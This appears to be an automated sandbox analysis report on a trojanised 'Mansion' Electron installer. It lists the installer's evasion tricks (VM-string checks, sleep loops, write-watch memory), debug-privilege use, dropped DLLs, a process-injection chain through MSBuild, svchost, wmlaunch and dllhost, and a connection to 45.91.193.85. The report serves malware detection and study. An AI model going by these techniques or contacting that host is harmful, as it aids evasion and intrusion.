Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API/Special instruction interceptor: Address: 7FFB2CECD044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECD044
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 526B83A

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\games\DDR5_NetCache\qtZint.exe	Memory allocated: 42D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Memory allocated: 4630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Memory allocated: 42D0000 memory reserve \| memory write watch	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe

Window / User API: foregroundWindowGot 866

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\System.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe TID: 6124

Thread sleep time: -30000s >= -30000s

Jump to behavior

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	File Volume queried: C:\Users\user\AppData\Roaming\my-electron-app\Code Cache\wasm FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	File Volume queried: C:\Users\user\AppData\Roaming\my-electron-app\blob_storage\a75057d9-634d-4613-b5d7-fb751fad2cd3 FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	File Volume queried: C:\Users\user\AppData\Roaming\my-electron-app\Cache\Cache_Data FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\resources	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user\Desktop\Mansion_setup (1).exe	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\app-64.7z	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\locales	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 0000000D.00000000.1565835129.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 0000000D.00000000.1565835129.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 0000000D.00000000.1565835129.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 0000000D.00000000.1547614933.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 0000000D.00000000.1541733935.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000D.00000000.1565835129.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.1539720367.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Enables debug privileges

Source: C:\games\DDR5_NetCache\qtZint.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\games\DDR5_NetCache\qtZint.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 45.91.193.85 1308

Allocates memory in foreign processes

Source: C:\Program Files\Windows Media Player\wmlaunch.exe

Memory allocated: C:\Windows\System32\dllhost.exe base: 168A8A30000 protect: page read and write

Writes to foreign memory regions

Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Memory written: C:\Windows\System32\dllhost.exe base: 168A8A30000
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF7D87314E0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\games\DDR5_NetCache\qtZint.exe C:\games\DDR5_NetCache\qtZint.exe	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --app-path="c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "c:\users\user~1\appdata\local\temp\2sbmkhykamuetmmmtcvrnvtlaaj\mansion.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8	Jump to behavior
